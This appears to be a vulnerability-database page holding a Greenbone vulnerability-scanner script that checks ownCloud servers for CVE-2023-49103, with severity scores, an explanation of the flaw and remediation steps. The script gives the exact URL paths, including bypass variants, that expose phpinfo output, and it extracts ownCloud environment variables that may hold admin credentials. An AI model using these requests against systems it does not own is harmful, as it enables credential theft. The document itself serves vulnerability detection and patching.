10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
6.2 Medium
AI Score
Confidence
High
0.939 High
EPSS
Percentile
99.2%
ownCloud is prone to an information disclosure vulnerability.
# SPDX-FileCopyrightText: 2023 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:owncloud:owncloud";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.151295");
script_version("2024-01-22T05:07:31+0000");
script_tag(name:"last_modification", value:"2024-01-22 05:07:31 +0000 (Mon, 22 Jan 2024)");
script_tag(name:"creation_date", value:"2023-11-23 04:46:15 +0000 (Thu, 23 Nov 2023)");
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2023-12-02 00:22:00 +0000 (Sat, 02 Dec 2023)");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_cve_id("CVE-2023-49103", "CVE-2023-49282");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
script_name("ownCloud Information Disclosure Vulnerability (Nov 2023) - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2023 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_owncloud_http_detect.nasl");
script_mandatory_keys("owncloud/http/detected");
script_require_ports("Services/www", 443);
script_tag(name:"summary", value:"ownCloud is prone to an information disclosure vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_tag(name:"insight", value:"The 'graphapi' app relies on a third-party library that
provides a URL. When this URL is accessed, it reveals the configuration details of the PHP
environment (phpinfo). This information includes all the environment variables of the webserver.
In containerized deployments, these environment variables may include sensitive data such as the
ownCloud admin password, mail server credentials, and license key.
Note: This issue consists of two different flaws with different severities:
- CVE-2023-49282: A general phpinfo() information disclosure in the used Microsoft Graph PHP SDK
which contains sensitive information about the environment usually rated with a 'medium' severity
- CVE-2023-49103: An environmental variable disclosure specific to ownCloud docker containers
rated with a 'high' severity");
script_tag(name:"affected", value:"All ownCloud instances shipping (don't need to be enabled) the
Graph API app in versions 0.2.0 through 0.3.0.
Note: Some ownCloud Docker images (e.g. version 10.13.0) have the phpinfo function already added
to the disable_functions of PHP and are thus not vulnerable.");
script_tag(name:"solution", value:"There are multiple solutions:
- Update the Graph API app to version 0.3.1 or later (e.g. via the Marketplace)
- Delete the file `/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php` from the
ownCloud installation folder
- Update to ownCloud 10.3.1 or later which is shipping the updated version 0.3.1 of the Graph API
app");
script_xref(name:"URL", value:"https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/");
script_xref(name:"URL", value:"https://github.com/creacitysec/CVE-2023-49103");
script_xref(name:"URL", value:"https://www.labs.greynoise.io/grimoire/2023-11-29-owncloud-redux/");
script_xref(name:"URL", value:"https://www.ambionics.io/blog/owncloud-cve-2023-49103-cve-2023-49105");
script_xref(name:"URL", value:"https://github.com/microsoftgraph/msgraph-sdk-php/security/advisories/GHSA-cgwq-6prq-8h9q");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE, service: "www"))
exit(0);
if (!dir = get_app_location(cpe: CPE, port: port))
exit(0);
if (dir == "/")
dir = "";
urls = make_list(
# For all instances / installations NOT having index.php-less URLs enabled
dir + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php",
# nb:
# - For all instances / installations having index.php-less URLs enabled
# - We're trying two different endpoints here just to be sure
dir + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css",
dir + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.js"
);
foreach url (urls) {
req = http_get(item: url, port: port);
res = http_keepalive_send_recv(port: port, data: req);
if (!res || res !~ "^HTTP/1\.[01] 200")
continue;
if (concl = http_check_for_phpinfo_output(data: res)) {
report = http_report_vuln_url(port: port, url: url);
report += '\nConcluded from:\n' + concl;
# <tr><td class="e">$_ENV['OWNCLOUD_ADMIN_USERNAME']</td><td class="v">admin</td></tr>
if (env_vars = egrep(string: res, pattern: "ENV.+OWNCLOUD_.+", icase: FALSE)) {
env_vars = chomp(env_vars);
report += '\n\nThe following possible sensitive ownCloud specific environment variables have been identified:\n\n' + env_vars;
}
security_message(port: port, data: report);
exit(0);
}
}
exit(99);
github.com/creacitysec/CVE-2023-49103
github.com/microsoftgraph/msgraph-sdk-php/security/advisories/GHSA-cgwq-6prq-8h9q
owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/
www.ambionics.io/blog/owncloud-cve-2023-49103-cve-2023-49105
www.cisa.gov/known-exploited-vulnerabilities-catalog
www.labs.greynoise.io/grimoire/2023-11-29-owncloud-redux/
Known Exploited Vulnerability (KEV) catalog
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
6.2 Medium
AI Score
Confidence
High
0.939 High
EPSS
Percentile
99.2%